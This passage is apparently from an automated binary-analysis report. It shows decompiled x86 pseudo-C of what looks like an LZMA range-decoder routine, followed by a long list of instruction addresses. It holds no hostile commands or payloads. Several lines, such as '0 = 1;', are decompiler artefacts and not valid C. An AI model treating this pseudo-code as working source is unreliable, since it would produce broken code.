                          							} else {
                          								__eax =  *(__ebp - 0x24);
                          							}
                          							__ecx =  *(__ebp - 0x28);
                          							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                          							L88:
                          							__ecx =  *(__ebp - 0x2c);
                          							 *(__ebp - 0x2c) = __eax;
                          							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                          							L89:
                          							__eax =  *(__ebp - 4);
                          							 *(__ebp - 0x80) = 0x15;
                          							__eax =  *(__ebp - 4) + 0xa68;
                          							 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                          							goto L68;
                          						case 0xc:
                          							L99:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0xc;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t334 = __ebp - 0x70;
                          							 *_t334 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t334;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							__eax =  *(__ebp - 0x2c);
                          							goto L101;
                          						case 0xd:
                          							goto L36;
                          						case 0xe:
                          							goto L45;
                          						case 0xf:
                          							goto L57;
                          						case 0x10:
                          							L109:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0x10;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t365 = __ebp - 0x70;
                          							 *_t365 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t365;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							goto L111;
                          						case 0x11:
                          							L68:
                          							__esi =  *(__ebp - 0x58);
                          							 *(__ebp - 0x84) = 0x12;
                          							goto L132;
                          						case 0x12:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								__eax =  *(__ebp - 0x58);
                          								 *(__ebp - 0x84) = 0x13;
                          								__esi =  *(__ebp - 0x58) + 2;
                          								goto L132;
                          							}
                          							__eax =  *(__ebp - 0x4c);
                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                          							__ecx =  *(__ebp - 0x58);
                          							__eax =  *(__ebp - 0x4c) << 4;
                          							__eflags = __eax;
                          							__eax =  *(__ebp - 0x58) + __eax + 4;
                          							goto L130;
                          						case 0x13:
                          							__eflags =  *(__ebp - 0x40);
                          							if( *(__ebp - 0x40) != 0) {
                          								_t469 = __ebp - 0x58;
                          								 *_t469 =  *(__ebp - 0x58) + 0x204;
                          								__eflags =  *_t469;
                          								 *(__ebp - 0x30) = 0x10;
                          								 *(__ebp - 0x40) = 8;
                          								L144:
                          								 *(__ebp - 0x7c) = 0x14;
                          								goto L145;
                          							}
                          							__eax =  *(__ebp - 0x4c);
                          							__ecx =  *(__ebp - 0x58);
                          							__eax =  *(__ebp - 0x4c) << 4;
                          							 *(__ebp - 0x30) = 8;
                          							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                          							L130:
                          							 *(__ebp - 0x58) = __eax;
                          							 *(__ebp - 0x40) = 3;
                          							goto L144;
                          						case 0x14:
                          							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                          							__eax =  *(__ebp - 0x80);
                          							goto L140;
                          						case 0x15:
                          							__eax = 0;
                          							__eflags =  *(__ebp - 0x38) - 7;
                          							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                          							__al = __al & 0x000000fd;
                          							__eax = (__eflags >= 0) - 1 + 0xb;
                          							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                          							goto L120;
                          						case 0x16:
                          							__eax =  *(__ebp - 0x30);
                          							__eflags = __eax - 4;
                          							if(__eax >= 4) {
                          								_push(3);
                          								_pop(__eax);
                          							}
                          							__ecx =  *(__ebp - 4);
                          							 *(__ebp - 0x40) = 6;
                          							__eax = __eax << 7;
                          							 *(__ebp - 0x7c) = 0x19;
                          							 *(__ebp - 0x58) = __eax;
                          							goto L145;
                          						case 0x17:
                          							L145:
                          							__eax =  *(__ebp - 0x40);
                          							 *(__ebp - 0x50) = 1;
                          							 *(__ebp - 0x48) =  *(__ebp - 0x40);
                          							goto L149;
                          						case 0x18:
                          							L146:
                          							__eflags =  *(__ebp - 0x6c);
                          							if( *(__ebp - 0x6c) == 0) {
                          								 *(__ebp - 0x88) = 0x18;
                          								goto L170;
                          							}
                          							__ecx =  *(__ebp - 0x70);
                          							__eax =  *(__ebp - 0xc);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                          							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                          							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                          							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							_t484 = __ebp - 0x70;
                          							 *_t484 =  *(__ebp - 0x70) + 1;
                          							__eflags =  *_t484;
                          							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                          							L148:
                          							_t487 = __ebp - 0x48;
                          							 *_t487 =  *(__ebp - 0x48) - 1;
                          							__eflags =  *_t487;
                          							L149:
                          							__eflags =  *(__ebp - 0x48);
                          							if( *(__ebp - 0x48) <= 0) {
                          								__ecx =  *(__ebp - 0x40);
                          								__ebx =  *(__ebp - 0x50);
                          								0 = 1;
                          								__eax = 1 << __cl;
                          								__ebx =  *(__ebp - 0x50) - (1 << __cl);
                          								__eax =  *(__ebp - 0x7c);
                          								 *(__ebp - 0x44) = __ebx;
                          								goto L140;
                          							}
                          							__eax =  *(__ebp - 0x50);
                          							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          							__eax =  *(__ebp - 0x58);
                          							__esi = __edx + __eax;
                          							 *(__ebp - 0x54) = __esi;
                          							__ax =  *__esi;
                          							__edi = __ax & 0x0000ffff;
                          							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                          							__eflags =  *(__ebp - 0xc) - __ecx;
                          							if( *(__ebp - 0xc) >= __ecx) {
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                          								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                          								__cx = __ax;
                          								__cx = __ax >> 5;
                          								__eax = __eax - __ecx;
                          								__edx = __edx + 1;
                          								__eflags = __edx;
                          								 *__esi = __ax;
                          								 *(__ebp - 0x50) = __edx;
                          							} else {
                          								 *(__ebp - 0x10) = __ecx;
                          								0x800 = 0x800 - __edi;
                          								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                          								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          								 *__esi = __cx;
                          							}
                          							__eflags =  *(__ebp - 0x10) - 0x1000000;
                          							if( *(__ebp - 0x10) >= 0x1000000) {
                          								goto L148;
                          							} else {
                          								goto L146;
                          							}
                          						case 0x19:
                          							__eflags = __ebx - 4;
                          							if(__ebx < 4) {
                          								 *(__ebp - 0x2c) = __ebx;
                          								L119:
                          								_t393 = __ebp - 0x2c;
                          								 *_t393 =  *(__ebp - 0x2c) + 1;
                          								__eflags =  *_t393;
                          								L120:
                          								__eax =  *(__ebp - 0x2c);
                          								__eflags = __eax;
                          								if(__eax == 0) {
                          									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                          									goto L170;
                          								}
                          								__eflags = __eax -  *(__ebp - 0x60);
                          								if(__eax >  *(__ebp - 0x60)) {
                          									goto L171;
                          								}
                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                          								__eax =  *(__ebp - 0x30);
                          								_t400 = __ebp - 0x60;
                          								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                          								__eflags =  *_t400;
                          								goto L123;
                          							}
                          							__ecx = __ebx;
                          							__eax = __ebx;
                          							__ecx = __ebx >> 1;
                          							__eax = __ebx & 0x00000001;
                          							__ecx = (__ebx >> 1) - 1;
                          							__al = __al | 0x00000002;
                          							__eax = (__ebx & 0x00000001) << __cl;
                          							__eflags = __ebx - 0xe;
                          							 *(__ebp - 0x2c) = __eax;
                          							if(__ebx >= 0xe) {
                          								__ebx = 0;
                          								 *(__ebp - 0x48) = __ecx;
                          								L102:
                          								__eflags =  *(__ebp - 0x48);
                          								if( *(__ebp - 0x48) <= 0) {
                          									__eax = __eax + __ebx;
                          									 *(__ebp - 0x40) = 4;
                          									 *(__ebp - 0x2c) = __eax;
                          									__eax =  *(__ebp - 4);
                          									__eax =  *(__ebp - 4) + 0x644;
                          									__eflags = __eax;
                          									L108:
                          									__ebx = 0;
                          									 *(__ebp - 0x58) = __eax;
                          									 *(__ebp - 0x50) = 1;
                          									 *(__ebp - 0x44) = 0;
                          									 *(__ebp - 0x48) = 0;
                          									L112:
                          									__eax =  *(__ebp - 0x40);
                          									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                          									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                          										_t391 = __ebp - 0x2c;
                          										 *_t391 =  *(__ebp - 0x2c) + __ebx;
                          										__eflags =  *_t391;
                          										goto L119;
                          									}
                          									__eax =  *(__ebp - 0x50);
                          									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                          									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                          									__eax =  *(__ebp - 0x58);
                          									__esi = __edi + __eax;
                          									 *(__ebp - 0x54) = __esi;
                          									__ax =  *__esi;
                          									__ecx = __ax & 0x0000ffff;
                          									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                          									__eflags =  *(__ebp - 0xc) - __edx;
                          									if( *(__ebp - 0xc) >= __edx) {
                          										__ecx = 0;
                          										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                          										__ecx = 1;
                          										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                          										__ebx = 1;
                          										__ecx =  *(__ebp - 0x48);
                          										__ebx = 1 << __cl;
                          										__ecx = 1 << __cl;
                          										__ebx =  *(__ebp - 0x44);
                          										__ebx =  *(__ebp - 0x44) | __ecx;
                          										__cx = __ax;
                          										__cx = __ax >> 5;
                          										__eax = __eax - __ecx;
                          										__edi = __edi + 1;
                          										__eflags = __edi;
                          										 *(__ebp - 0x44) = __ebx;
                          										 *__esi = __ax;
                          										 *(__ebp - 0x50) = __edi;
                          									} else {
                          										 *(__ebp - 0x10) = __edx;
                          										0x800 = 0x800 - __ecx;
                          										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                          										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                          										 *__esi = __dx;
                          									}
                          									__eflags =  *(__ebp - 0x10) - 0x1000000;
                          									if( *(__ebp - 0x10) >= 0x1000000) {
                          										L111:
                          										_t368 = __ebp - 0x48;
                          										 *_t368 =  *(__ebp - 0x48) + 1;
                          										__eflags =  *_t368;
                          										goto L112;
                          									} else {
                          										goto L109;
                          									}
                          								}
                          								__ecx =  *(__ebp - 0xc);
                          								__ebx = __ebx + __ebx;
                          								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                          								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          								 *(__ebp - 0x44) = __ebx;
                          								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                          									__ecx =  *(__ebp - 0x10);
                          									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                          									__ebx = __ebx | 0x00000001;
                          									__eflags = __ebx;
                          									 *(__ebp - 0x44) = __ebx;
                          								}
                          								__eflags =  *(__ebp - 0x10) - 0x1000000;
                          								if( *(__ebp - 0x10) >= 0x1000000) {
                          									L101:
                          									_t338 = __ebp - 0x48;
                          									 *_t338 =  *(__ebp - 0x48) - 1;
                          									__eflags =  *_t338;
                          									goto L102;
                          								} else {
                          									goto L99;
                          								}
                          							}
                          							__edx =  *(__ebp - 4);
                          							__eax = __eax - __ebx;
                          							 *(__ebp - 0x40) = __ecx;
                          							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                          							goto L108;
                          						case 0x1a:
                          							goto L55;
                          						case 0x1b:
                          							L75:
                          							__eflags =  *(__ebp - 0x64);
                          							if( *(__ebp - 0x64) == 0) {
                          								 *(__ebp - 0x88) = 0x1b;
                          								goto L170;
                          							}
                          							__eax =  *(__ebp - 0x14);
                          							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          							__eflags = __eax -  *(__ebp - 0x74);
                          							if(__eax >=  *(__ebp - 0x74)) {
                          								__eax = __eax +  *(__ebp - 0x74);
                          								__eflags = __eax;
                          							}
                          							__edx =  *(__ebp - 8);
                          							__cl =  *(__eax + __edx);
                          							__eax =  *(__ebp - 0x14);
                          							 *(__ebp - 0x5c) = __cl;
                          							 *(__eax + __edx) = __cl;
                          							__eax = __eax + 1;
                          							__edx = 0;
                          							_t274 = __eax %  *(__ebp - 0x74);
                          							__eax = __eax /  *(__ebp - 0x74);
                          							__edx = _t274;
                          							__eax =  *(__ebp - 0x68);
                          							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                          							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          							_t283 = __ebp - 0x64;
                          							 *_t283 =  *(__ebp - 0x64) - 1;
                          							__eflags =  *_t283;
                          							 *( *(__ebp - 0x68)) = __cl;
                          							goto L79;
                          						case 0x1c:
                          							while(1) {
                          								L123:
                          								__eflags =  *(__ebp - 0x64);
                          								if( *(__ebp - 0x64) == 0) {
                          									break;
                          								}
                          								__eax =  *(__ebp - 0x14);
                          								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                          								__eflags = __eax -  *(__ebp - 0x74);
                          								if(__eax >=  *(__ebp - 0x74)) {
                          									__eax = __eax +  *(__ebp - 0x74);
                          									__eflags = __eax;
                          								}
                          								__edx =  *(__ebp - 8);
                          								__cl =  *(__eax + __edx);
                          								__eax =  *(__ebp - 0x14);
                          								 *(__ebp - 0x5c) = __cl;
                          								 *(__eax + __edx) = __cl;
                          								__eax = __eax + 1;
                          								__edx = 0;
                          								_t414 = __eax %  *(__ebp - 0x74);
                          								__eax = __eax /  *(__ebp - 0x74);
                          								__edx = _t414;
                          								__eax =  *(__ebp - 0x68);
                          								 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                          								 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                          								 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                          								__eflags =  *(__ebp - 0x30);
                          								 *( *(__ebp - 0x68)) = __cl;
                          								 *(__ebp - 0x14) = __edx;
                          								if( *(__ebp - 0x30) > 0) {
                          									continue;
                          								} else {
                          									goto L80;
                          								}
                          							}
                          							 *(__ebp - 0x88) = 0x1c;
                          							goto L170;
                          					}
                          				}
                          			}













                          0x00000000
                          0x0040604c
                          0x0040604c
                          0x00406051
                          0x004060c8
                          0x004060cf
                          0x004060d9
                          0x004066b8
                          0x004066b8
                          0x004066bb
                          0x004066bb
                          0x004066c1
                          0x004066c7
                          0x004066cd
                          0x004066e7
                          0x004066ea
                          0x004066f0
                          0x004066fb
                          0x004066fd
                          0x004066cf
                          0x004066cf
                          0x004066de
                          0x004066e2
                          0x004066e2
                          0x00406707
                          0x0040672e
                          0x0040672e
                          0x00406734
                          0x00406734
                          0x00000000
                          0x00406709
                          0x00406709
                          0x0040670d
                          0x004068bc
                          0x00000000
                          0x004068bc
                          0x00406719
                          0x00406720
                          0x00406728
                          0x0040672b
                          0x00000000
                          0x0040672b
                          0x00406053
                          0x00406053
                          0x00406057
                          0x0040605f
                          0x00406062
                          0x00406064
                          0x00406067
                          0x00406069
                          0x0040606e
                          0x00406071
                          0x00406078
                          0x0040607f
                          0x00406082
                          0x0040608d
                          0x00406095
                          0x00406095
                          0x0040608f
                          0x0040608f
                          0x0040608f
                          0x00406084
                          0x00406084
                          0x00406084
                          0x0040609c
                          0x004060ba
                          0x004060bc
                          0x0040628f
                          0x0040628f
                          0x00406292
                          0x00406295
                          0x00406298
                          0x0040629b
                          0x0040629e
                          0x004062a1
                          0x004062a4
                          0x004062a7
                          0x004062ad
                          0x004062c5
                          0x004062c8
                          0x004062cb
                          0x004062ce
                          0x004062ce
                          0x004062d1
                          0x004062d7
                          0x004062af
                          0x004062af
                          0x004062b7
                          0x004062bc
                          0x004062be
                          0x004062c0
                          0x004062c0
                          0x004062e1
                          0x004062e4
                          0x00406287
                          0x0040628d
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004062e6
                          0x00406262
                          0x00406266
                          0x0040686e
                          0x00000000
                          0x0040686e
                          0x0040626c
                          0x0040626f
                          0x00406272
                          0x00406276
                          0x00406279
                          0x0040627f
                          0x00406281
                          0x00406281
                          0x00406284
                          0x00000000
                          0x00406284
                          0x0040609e
                          0x0040609e
                          0x004060a1
                          0x004060a7
                          0x004060a9
                          0x004060a9
                          0x004060ac
                          0x004060af
                          0x004060b1
                          0x004060b2
                          0x004060b5
                          0x00406122
                          0x00406122
                          0x00406126
                          0x00406129
                          0x0040612c
                          0x0040612f
                          0x00406132
                          0x00406133
                          0x00406136
                          0x00406138
                          0x0040613e
                          0x00406141
                          0x00406144
                          0x00406147
                          0x0040614a
                          0x00406150
                          0x0040616c
                          0x0040616f
                          0x00406172
                          0x00406175
                          0x0040617c
                          0x00406182
                          0x00406186
                          0x00406152
                          0x00406152
                          0x00406156
                          0x0040615e
                          0x00406163
                          0x00406165
                          0x00406167
                          0x00406167
                          0x00406190
                          0x00406193
                          0x0040610a
                          0x0040610a
                          0x00406110
                          0x004061c3
                          0x004061c9
                          0x00000000
                          0x00000000
                          0x004061cb
                          0x004061ce
                          0x004061d1
                          0x004061d4
                          0x004061d7
                          0x004061da
                          0x004061dd
                          0x004061e0
                          0x004061e3
                          0x004061e9
                          0x00406201
                          0x00406204
                          0x00406207
                          0x0040620a
                          0x0040620a
                          0x0040620d
                          0x00406213
                          0x004061eb
                          0x004061eb
                          0x004061f3
                          0x004061f8
                          0x004061fa
                          0x004061fc
                          0x004061fc
                          0x0040621d
                          0x00406220
                          0x0040619e
                          0x004061a2
                          0x00406862
                          0x00000000
                          0x00406862
                          0x004061a8
                          0x004061ab
                          0x004061ae
                          0x004061b2
                          0x004061b5
                          0x004061bb
                          0x004061bd
                          0x004061bd
                          0x004061c0
                          0x004061c0
                          0x00406220
                          0x00406227
                          0x00406227
                          0x00406227
                          0x0040622b
                          0x0040622b
                          0x0040622e
                          0x00406231
                          0x00406235
                          0x0040687a
                          0x00000000
                          0x0040687a
                          0x0040623b
                          0x0040623e
                          0x00406241
                          0x00406244
                          0x00406247
                          0x0040624a
                          0x0040624d
                          0x0040624f
                          0x00406252
                          0x00406255
                          0x00406258
                          0x0040625a
                          0x0040625a
                          0x0040625a
                          0x004063f7
                          0x004063f7
                          0x004063fa
                          0x004063fa
                          0x00000000
                          0x004063fa
                          0x0040611c
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406199
                          0x004060e5
                          0x004060e9
                          0x00406856
                          0x004068d2
                          0x004068da
                          0x004068e1
                          0x004068e3
                          0x004068ea
                          0x004068ee
                          0x004068ee
                          0x004060ef
                          0x004060f2
                          0x004060f5
                          0x004060f9
                          0x004060fc
                          0x00406102
                          0x00406104
                          0x00406104
                          0x00406107
                          0x00000000
                          0x00406107
                          0x00406193
                          0x0040609c
                          0x00405ed0
                          0x00405ed0
                          0x00405ed9
                          0x004068e7
                          0x004068e7
                          0x00000000
                          0x004068e7
                          0x00405edf
                          0x00000000
                          0x00405eea
                          0x00000000
                          0x00000000
                          0x00405ef3
                          0x00405ef6
                          0x00405ef9
                          0x00405efd
                          0x00000000
                          0x00000000
                          0x00405f03
                          0x00405f06
                          0x00405f08
                          0x00405f09
                          0x00405f0c
                          0x00405f0e
                          0x00405f0f
                          0x00405f11
                          0x00405f14
                          0x00405f19
                          0x00405f1e
                          0x00405f27
                          0x00405f3a
                          0x00405f3d
                          0x00405f49
                          0x00405f71
                          0x00405f73
                          0x00405f81
                          0x00405f81
                          0x00405f85
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00405f75
                          0x00405f75
                          0x00405f78
                          0x00405f79
                          0x00405f79
                          0x00000000
                          0x00405f75
                          0x00405f4f
                          0x00405f54
                          0x00405f54
                          0x00405f5d
                          0x00405f65
                          0x00405f68
                          0x00000000
                          0x00405f6e
                          0x00405f6e
                          0x00000000
                          0x00405f6e
                          0x00000000
                          0x00405f8b
                          0x00405f8b
                          0x00405f8f
                          0x0040683b
                          0x00000000
                          0x0040683b
                          0x00405f98
                          0x00405fa8
                          0x00405fab
                          0x00405fae
                          0x00405fae
                          0x00405fae
                          0x00405fb1
                          0x00405fb5
                          0x00000000
                          0x00000000
                          0x00405fb7
                          0x00405fbd
                          0x00405fe7
                          0x00405fed
                          0x00405ff4
                          0x00000000
                          0x00405ff4
                          0x00405fc3
                          0x00405fc6
                          0x00405fcb
                          0x00405fcb
                          0x00405fd6
                          0x00405fde
                          0x00405fe1
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406026
                          0x0040602c
                          0x0040602f
                          0x0040603c
                          0x00406044
                          0x00000000
                          0x00000000
                          0x00405ffb
                          0x00405ffb
                          0x00405fff
                          0x0040684a
                          0x00000000
                          0x0040684a
                          0x0040600b
                          0x00406016
                          0x00406016
                          0x00406016
                          0x00406019
                          0x0040601c
                          0x0040601f
                          0x00406024
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004062eb
                          0x004062ef
                          0x0040630d
                          0x00406310
                          0x00406317
                          0x0040631a
                          0x0040631d
                          0x00406320
                          0x00406323
                          0x00406326
                          0x00406328
                          0x0040632f
                          0x00406330
                          0x00406332
                          0x00406335
                          0x00406338
                          0x0040633b
                          0x0040633b
                          0x00406340
                          0x00000000
                          0x00406340
                          0x004062f1
                          0x004062f4
                          0x004062f7
                          0x00406301
                          0x00000000
                          0x00000000
                          0x00406355
                          0x00406359
                          0x0040637c
                          0x0040637f
                          0x00406382
                          0x0040638c
                          0x0040635b
                          0x0040635b
                          0x0040635e
                          0x00406361
                          0x00406364
                          0x00406371
                          0x00406374
                          0x00406374
                          0x00000000
                          0x00000000
                          0x00406398
                          0x0040639c
                          0x00000000
                          0x00000000
                          0x004063a2
                          0x004063a6
                          0x00000000
                          0x00000000
                          0x004063ac
                          0x004063ae
                          0x004063b2
                          0x004063b2
                          0x004063b5
                          0x004063b9
                          0x00000000
                          0x00000000
                          0x00406409
                          0x0040640d
                          0x00406414
                          0x00406417
                          0x0040641a
                          0x00406424
                          0x00000000
                          0x00406424
                          0x0040640f
                          0x00000000
                          0x00000000
                          0x00406430
                          0x00406434
                          0x0040643b
                          0x0040643e
                          0x00406441
                          0x00406436
                          0x00406436
                          0x00406436
                          0x00406444
                          0x00406447
                          0x0040644a
                          0x0040644a
                          0x0040644d
                          0x00406450
                          0x00406453
                          0x00406453
                          0x00406456
                          0x0040645d
                          0x00406462
                          0x00000000
                          0x00000000
                          0x004064f0
                          0x004064f0
                          0x004064f4
                          0x00406892
                          0x00000000
                          0x00406892
                          0x004064fa
                          0x004064fd
                          0x00406500
                          0x00406504
                          0x00406507
                          0x0040650d
                          0x0040650f
                          0x0040650f
                          0x0040650f
                          0x00406512
                          0x00406515
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00406573
                          0x00406573
                          0x00406577
                          0x0040689e
                          0x00000000
                          0x0040689e
                          0x0040657d
                          0x00406580
                          0x00406583
                          0x00406587
                          0x0040658a
                          0x00406590
                          0x00406592
                          0x00406592
                          0x00406592
                          0x00406595
                          0x00000000
                          0x00000000
                          0x00406343
                          0x00406343
                          0x00406346
                          0x00000000
                          0x00000000
                          0x00406682
                          0x00406686
                          0x004066a8
                          0x004066ab
                          0x004066b5
                          0x00000000
                          0x004066b5
                          0x00406688
                          0x0040668b
                          0x0040668f
                          0x00406692
                          0x00406692
                          0x00406695
                          0x00000000
                          0x00000000
                          0x0040673f
                          0x00406743
                          0x00406761
                          0x00406761
                          0x00406761
                          0x00406768
                          0x0040676f
                          0x00406776
                          0x00406776
                          0x00000000
                          0x00406776
                          0x00406745
                          0x00406748
                          0x0040674b
                          0x0040674e
                          0x00406755
                          0x00406699
                          0x00406699
                          0x0040669c
                          0x00000000
                          0x00000000
                          0x00406830
                          0x00406833
                          0x00000000
                          0x00000000
                          0x0040646a
                          0x0040646c
                          0x00406473
                          0x00406474
                          0x00406476
                          0x00406479
                          0x00000000
                          0x00000000
                          0x00406481
                          0x00406484
                          0x00406487
                          0x00406489
                          0x0040648b
                          0x0040648b
                          0x0040648c
                          0x0040648f
                          0x00406496
                          0x00406499
                          0x004064a7
                          0x00000000
                          0x00000000
                          0x0040677d
                          0x0040677d
                          0x00406780
                          0x00406787
                          0x00000000
                          0x00000000
                          0x0040678c
                          0x0040678c
                          0x00406790
                          0x004068c8
                          0x00000000
                          0x004068c8
                          0x00406796
                          0x00406799
                          0x0040679c
                          0x004067a0
                          0x004067a3
                          0x004067a9
                          0x004067ab
                          0x004067ab
                          0x004067ab
                          0x004067ae
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b1
                          0x004067b4
                          0x004067b4
                          0x004067b8
                          0x00406818
                          0x0040681b
                          0x00406820
                          0x00406821
                          0x00406823
                          0x00406825
                          0x00406828
                          0x00000000
                          0x00406828
                          0x004067ba
                          0x004067c0
                          0x004067c3
                          0x004067c6
                          0x004067c9
                          0x004067cc
                          0x004067cf
                          0x004067d2
                          0x004067d5
                          0x004067d8
                          0x004067db
                          0x004067f4
                          0x004067f7
                          0x004067fa
                          0x004067fd
                          0x00406801
                          0x00406803
                          0x00406803
                          0x00406804
                          0x00406807
                          0x004067dd
                          0x004067dd
                          0x004067e5
                          0x004067ea
                          0x004067ec
                          0x004067ef
                          0x004067ef
                          0x0040680a
                          0x00406811
                          0x00000000
                          0x00406813
                          0x00000000
                          0x00406813
                          0x00000000
                          0x004064af
                          0x004064b2
                          0x004064e8
                          0x00406618
                          0x00406618
                          0x00406618
                          0x00406618
                          0x0040661b
                          0x0040661b
                          0x0040661e
                          0x00406620
                          0x004068aa
                          0x00000000
                          0x004068aa
                          0x00406626
                          0x00406629
                          0x00000000
                          0x00000000
                          0x0040662f
                          0x00406633
                          0x00406636
                          0x00406636
                          0x00406636
                          0x00000000
                          0x00406636
                          0x004064b4
                          0x004064b6
                          0x004064b8
                          0x004064ba
                          0x004064bd
                          0x004064be
                          0x004064c0
                          0x004064c2
                          0x004064c5
                          0x004064c8
                          0x004064de
                          0x004064e3
                          0x0040651b
                          0x0040651b
                          0x0040651f
                          0x0040654b
                          0x0040654d
                          0x00406554
                          0x00406557
                          0x0040655a
                          0x0040655a
                          0x0040655f
                          0x0040655f
                          0x00406561
                          0x00406564
                          0x0040656b
                          0x0040656e
                          0x0040659b
                          0x0040659b
                          0x0040659e
                          0x004065a1
                          0x00406615
                          0x00406615
                          0x00406615
                          0x00000000
                          0x00406615
                          0x004065a3
                          0x004065a9
                          0x004065ac
                          0x004065af
                          0x004065b2
                          0x004065b5
                          0x004065b8
                          0x004065bb
                          0x004065be
                          0x004065c1
                          0x004065c4
                          0x004065dd
                          0x004065df
                          0x004065e2
                          0x004065e3
                          0x004065e6
                          0x004065e8
                          0x004065eb
                          0x004065ed
                          0x004065ef
                          0x004065f2
                          0x004065f4
                          0x004065f7
                          0x004065fb
                          0x004065fd
                          0x004065fd
                          0x004065fe
                          0x00406601
                          0x00406604
                          0x004065c6
                          0x004065c6
                          0x004065ce
                          0x004065d3
                          0x004065d5
                          0x004065d8
                          0x004065d8
                          0x00406607
                          0x0040660e
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00406598
                          0x00000000
                          0x00406610
                          0x00000000
                          0x00406610
                          0x0040660e
                          0x00406521
                          0x00406524
                          0x00406526
                          0x00406529
                          0x0040652c
                          0x0040652f
                          0x00406531
                          0x00406534
                          0x00406537
                          0x00406537
                          0x0040653a
                          0x0040653a
                          0x0040653d
                          0x00406544
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00406518
                          0x00000000
                          0x00406546
                          0x00000000
                          0x00406546
                          0x00406544
                          0x004064ca
                          0x004064cd
                          0x004064cf
                          0x004064d2
                          0x00000000
                          0x00000000
                          0x00000000
                          0x00000000
                          0x004063bc
                          0x004063bc
                          0x004063c0
                          0x00406886
                          0x00000000
                          0x00406886
                          0x004063c6
                          0x004063c9
